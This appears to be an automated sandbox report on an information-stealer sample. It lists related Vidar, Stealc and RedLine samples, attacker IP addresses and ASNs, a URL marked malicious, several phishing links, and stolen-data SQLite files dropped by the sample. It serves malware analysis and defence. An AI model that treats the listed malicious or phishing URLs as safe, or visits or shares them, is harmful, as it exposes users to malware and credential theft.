	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	195.181.163.196
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	195.181.163.196
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	195.181.163.195
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	169.150.236.98
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	169.150.236.97
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.251
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.247
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.246
	EvRwwa6vJW.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.247

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NADYMSS-ASRU	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	w3WOJ1ohgD.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	http://185.172.128.63/v8sjh3hs8/index.php	Get hash	malicious	Unknown	Browse	185.172.128.63
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
NADYMSS-ASRU	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	w3WOJ1ohgD.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	http://185.172.128.63/v8sjh3hs8/index.php	Get hash	malicious	Unknown	Browse	185.172.128.63
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
MICROSOFT-CORP-MSN-AS-BLOCKUS	phish_alert_sp2_2.0.0.0 - 2024-04-26T151509.287.eml	Get hash	malicious	HTMLPhisher	Browse	52.168.117.168
	https://herofargwsmnncmwsrcnmwsncmwscnm.popsy.site/	Get hash	malicious	HTMLPhisher	Browse	52.96.104.50
	https://gjyefv.degaris.com/	Get hash	malicious	HTMLPhisher	Browse	13.107.213.41
	https://www.flowcode.com/page/theferrucciolawfirm	Get hash	malicious	Unknown	Browse	13.107.213.41
	Settlement DOL 08262024 - Victoria Brignon - Reference #27224675-2722934.html	Get hash	malicious	HTMLPhisher	Browse	13.107.213.41
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	https://click.pstmrk.it/3s/t.co%2FRieqFTtqmt/gMTC/7_W0AQ/AQ/880c85de-cc11-4181-9f68-0f08d9f1e222/1/rCUNy3Yffz	Get hash	malicious	HTMLPhisher	Browse	52.96.165.130
	file.exe	Get hash	malicious	Unknown	Browse	52.178.17.234
	file.exe	Get hash	malicious	Unknown	Browse	204.79.197.219
	https://click.pstmrk.it/3s/t.co%2FRieqFTtqmt/gMTC/7_W0AQ/AQ/880c85de-cc11-4181-9f68-0f08d9f1e222/1/rCUNy3Yffz	Get hash	malicious	HTMLPhisher	Browse	52.96.28.178
NADYMSS-ASRU	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	w3WOJ1ohgD.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	http://185.172.128.63/v8sjh3hs8/index.php	Get hash	malicious	Unknown	Browse	185.172.128.63
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://sites.google.com/authorizewebcenter.com/565hu4?usp=sharing	Get hash	malicious	HTMLPhisher	Browse	195.181.163.193
	http://carajasnutricaoanimal.com	Get hash	malicious	Unknown	Browse	195.181.163.193
	Lab5-1.docx	Get hash	malicious	Unknown	Browse	195.181.163.193
	Purchase Order is approved26042024.cmd	Get hash	malicious	Remcos, DBatLoader	Browse	195.181.163.193
	https://messageis.ru/pre/profile/message	Get hash	malicious	HTMLPhisher	Browse	195.181.163.193
	MSG.docx	Get hash	malicious	Unknown	Browse	195.181.163.193
	http://trailersalesandparts.ca	Get hash	malicious	Unknown	Browse	195.181.163.193
	https://open.camscanner.com/doc/download_file?platform=web&type=118&sid=8c5645d2944c4b262e3b5813d266f0d5&title=ProjectUpdate-X	Get hash	malicious	HTMLPhisher	Browse	195.181.163.193
	https://doc-42.jimdosite.com/	Get hash	malicious	HTMLPhisher	Browse	195.181.163.193
	https://live.easygenerator.com/review/course/3850bd4a-58ae-47b2-bb6f-157e213d949f/	Get hash	malicious	Unknown	Browse	195.181.163.193

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	w3WOJ1ohgD.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	w3WOJ1ohgD.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\CGIDAAAKJJDBGCBFCBGI

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGIDAAAKJJDBGCBFCBGIIDHCFB

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGDBKFBA

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DTBZGIOOSO.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\ProgramData\FHJKKECFIECAKECAFBGCAFHDHJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JEHJKJEB

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JEHJKJEBGHJJKEBGIECAAFIJKJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KATAXZVCPS.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\ProgramData\KKFBAAFCGIEGDHIEBFII

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5ek.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_u5ek.0.exe_c4793a923f4cc69111ceaae60d9b71f164f7b3b_12fb6202_d8346ab6-0040-491c-9bf0-091b4131b0b0\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1419078651632497
Encrypted:	false
SSDEEP:	192:PiYzQxbFr0W7MSDjsqZrP2fVHmzuiF6Z24IO8NT:ayQxbF4W7MOjlKGzuiF6Y4IO8NT
MD5:	D6B842E198E4EF72F3ACAE6909550E64
SHA1:	8CC46DCF991199D9F97B32748D133164C3B11ECE
SHA-256:	29DE5D045803540A48EB7DB4F5139F94BAB9D9CF215C5F847DD245B752274511
SHA-512:	9F059693466A78BA8D3D82E0111C3B6C80A7961E958DEEED2C6BF3D4BBC381F9BF34577B0A7500D2EB5F246F87814AC369C9FFDADC47D7159246752402AD5B57
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.6.3.9.3.8.2.6.1.2.4.9.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.6.3.9.3.8.3.0.4.9.9.9.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.3.4.6.a.b.6.-.0.0.4.0.-.4.9.1.c.-.9.b.f.0.-.0.9.1.b.4.1.3.1.b.0.b.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.5.1.6.e.a.a.3.-.3.4.f.3.-.4.9.2.3.-.9.d.8.1.-.1.c.c.7.c.b.2.f.b.e.3.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.5.e.k...0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.9.c.-.0.0.0.1.-.0.0.1.4.-.f.d.c.9.-.5.6.f.3.1.d.9.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.3.6.2.c.5.b.2.a.b.6.e.4.2.4.0.4.7.9.6.e.5.8.8.0.8.4.d.f.5.7.f.0.0.0.0.f.f.f.f.!.0.0.0.0.9.a.6.f.1.c.a.6.f.1.0.3.5.9.1.e.4.5.3.b.9.9.1.b.a.0.e.c.7.f.b.a.3.7.8.6.3.e.6.3.!.u.5.e.k...0...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_wxfSIz4PAi.exe_5fbbe57adbe1229748d63767aa0a8f3a9b9562_4968f6c2_682abc5b-c1b4-400f-bf41-7d2b0fc4f781\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0872549014470918
Encrypted:	false
SSDEEP:	192:WKmc3EKt0jXFDjsqxeugCzuiF6Z24IO8CC:wc3EKujXFDjoCzuiF6Y4IO8C
MD5:	6BBEB61522B21573EDF7B353320EC3BB
SHA1:	3DC8D31A69A5DB2A8AA59AB95CF0A04300C518BF
SHA-256:	E89107396EFC23FCE600B9E6B485FC944E3090D6B14ED341EE2AC2E6BFB55935
SHA-512:	424DADCDD9CEA85EB353CA37097E16558ECF5EFFF1910200099C302B477D95E0A12517108EF9441D1BBDE7B18D4B1548A1A4A9C8E6EF82230AB8B43D7610411B
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.6.3.9.3.5.2.9.3.9.7.4.4.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.6.3.9.3.5.3.6.4.2.8.7.0.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.8.2.a.b.c.5.b.-.c.1.b.4.-.4.0.0.f.-.b.f.4.1.-.7.d.2.b.0.f.c.4.f.7.8.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.8.2.a.9.9.b.f.-.4.f.4.2.-.4.c.9.4.-.a.2.8.b.-.7.4.d.c.0.f.1.c.0.c.7.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.w.x.f.S.I.z.4.P.A.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.5.c.-.0.0.0.1.-.0.0.1.4.-.b.2.7.d.-.3.a.f.0.1.d.9.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.c.a.c.a.9.d.1.1.8.e.d.b.7.0.3.a.6.0.f.2.6.6.f.6.7.d.0.8.5.a.c.0.0.0.0.f.f.f.f.!.0.0.0.0.5.f.0.2.0.e.e.f.c.6.d.5.d.a.7.e.f.e.c.d.3.1.b.d.3.9.1.1.9.1.1.1.6.9.d.9.9.0.2.1.!.w.x.f.S.I.z.4.P.A.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5482.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Apr 26 21:09:42 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	62146
